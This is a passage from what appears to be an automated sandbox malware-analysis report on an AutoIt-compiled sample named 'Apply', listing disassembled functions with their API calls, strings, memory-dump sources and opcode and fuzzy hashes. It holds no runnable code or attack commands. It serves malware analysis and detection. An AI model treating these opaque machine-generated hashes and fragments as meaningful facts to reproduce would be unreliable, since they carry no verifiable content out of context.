                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Message
                                                    • String ID: AutoIt$Error allocating memory.
                                                    • API String ID: 2030045667-4017498283
                                                    • Opcode ID: 71fd72565bdb7eb99a0e56ad2d7c5293d459e90aaead62564ab7a23e062a7639
                                                    • Instruction ID: ed540a3e71e971000d7581abd64d68752fd98c2e85cd03d51f3e65ef4ce09e2e
                                                    • Opcode Fuzzy Hash: 71fd72565bdb7eb99a0e56ad2d7c5293d459e90aaead62564ab7a23e062a7639
                                                    • Instruction Fuzzy Hash: 3FE0D83228875867D21537987C03FC57A85FF05B51F608416FA4CD91C24AE2648455EA
                                                    APIs
                                                      • Part of subcall function 0086FBC6: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,008710C1,?,?,?,0085100A), ref: 0086FBCB
                                                    • IsDebuggerPresent.KERNEL32(?,?,?,0085100A), ref: 008710C5
                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0085100A), ref: 008710D4
                                                    Strings
                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 008710CF
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                    • API String ID: 55579361-631824599
                                                    • Opcode ID: 355c419d423c2a2fd8a6d92ff4e0170f6d6e0064766e2d07694bc2242d61d73a
                                                    • Instruction ID: f4065a1d91a822436c76dbb541506d06c9a19d1e08d28ce1b7cad70b73061aa0
                                                    • Opcode Fuzzy Hash: 355c419d423c2a2fd8a6d92ff4e0170f6d6e0064766e2d07694bc2242d61d73a
                                                    • Instruction Fuzzy Hash: 41E03970600B818EC720AF79E5487127BE0FB00700B008D5DE98AC6A52DBB5E48C8BA1
                                                    APIs
                                                    • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 008C371A
                                                    • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 008C372F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Temp$FileNamePath
                                                    • String ID: aut
                                                    • API String ID: 3285503233-3010740371
                                                    • Opcode ID: 5d7aec70ba9e814f8e39901ae3e3a1d132cc8d8ce1e0c7934ac28e14eb2dc362
                                                    • Instruction ID: d423ffb441798460424f51d08811d6dc89d54e70b66957dbd15cf1411c838bf0
                                                    • Opcode Fuzzy Hash: 5d7aec70ba9e814f8e39901ae3e3a1d132cc8d8ce1e0c7934ac28e14eb2dc362
                                                    • Instruction Fuzzy Hash: B2D05B7154031867DA2097509C4DFDB7A6CDB44710F0005517B5595091DAB0E585C790
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: LocalTime
                                                    • String ID: %.3d$X64
                                                    • API String ID: 481472006-1077770165
                                                    • Opcode ID: d0e623573312377a60e9a73a032e89919b1ba07f553e59c96dd5327351a1f99d
                                                    • Instruction ID: f002769871d64200e614716e9115e9f17ec2033780c8efdb45ce624a4990e8c4
                                                    • Opcode Fuzzy Hash: d0e623573312377a60e9a73a032e89919b1ba07f553e59c96dd5327351a1f99d
                                                    • Instruction Fuzzy Hash: FDD01265C0511DE9DB509694AC48CB9777CFB09308F548852F506D5501F724D548AB22
                                                    APIs
                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008E2AE7
                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 008E2AFA
                                                      • Part of subcall function 008BEFBC: Sleep.KERNEL32 ref: 008BF034
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: FindMessagePostSleepWindow
                                                    • String ID: Shell_TrayWnd
                                                    • API String ID: 529655941-2988720461
                                                    • Opcode ID: 508f808c294b4450cac9a9abf799748529c913a5258b5a7bd0c13715cfe4c4c6
                                                    • Instruction ID: 28edb5614be8e30745b4c22d659b8fb3c05956f56fe1bc048a9052e8c16158db
                                                    • Opcode Fuzzy Hash: 508f808c294b4450cac9a9abf799748529c913a5258b5a7bd0c13715cfe4c4c6
                                                    • Instruction Fuzzy Hash: 77D0C931384351AAE2646770AC4BFD6AA54BB51B11F1008257649AE3D0C9A468448654
                                                    APIs
                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008E2B27
                                                    • PostMessageW.USER32(00000000), ref: 008E2B2E
                                                      • Part of subcall function 008BEFBC: Sleep.KERNEL32 ref: 008BF034
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: FindMessagePostSleepWindow
                                                    • String ID: Shell_TrayWnd
                                                    • API String ID: 529655941-2988720461
                                                    • Opcode ID: 576ec6b2e816a165c40c32815ca732956e508574eb4176c6e27e7c43a3a3a948
                                                    • Instruction ID: 463c7d31c1e3396cd37cc3c47451c5621c490b1f3fd4b2b2972aace3f5ba3d11
                                                    • Opcode Fuzzy Hash: 576ec6b2e816a165c40c32815ca732956e508574eb4176c6e27e7c43a3a3a948
                                                    • Instruction Fuzzy Hash: 46D0C931381351AAF2656770AC4BFD6AA54BB55B11F1008257645EE3D0C9A468448654
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0088C1E4
                                                    • GetLastError.KERNEL32 ref: 0088C1F2
                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0088C24D
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                    • String ID:
                                                    • API String ID: 1717984340-0
                                                    • Opcode ID: 4f2eca018d1ebdcad12161a9aeaa1a300a05ff9c21f639ad16a9f81e168f7ecb
                                                    • Instruction ID: 5143f5fe22d9434917d1740a9b5e9c0217147c5d77c9b39cbdf7bd52ea8a5dec
                                                    • Opcode Fuzzy Hash: 4f2eca018d1ebdcad12161a9aeaa1a300a05ff9c21f639ad16a9f81e168f7ecb
                                                    • Instruction Fuzzy Hash: F641B431600246AFCB21AFE8C984AAE7BA5FF42720F254159E859DB1E9DB309D01CB71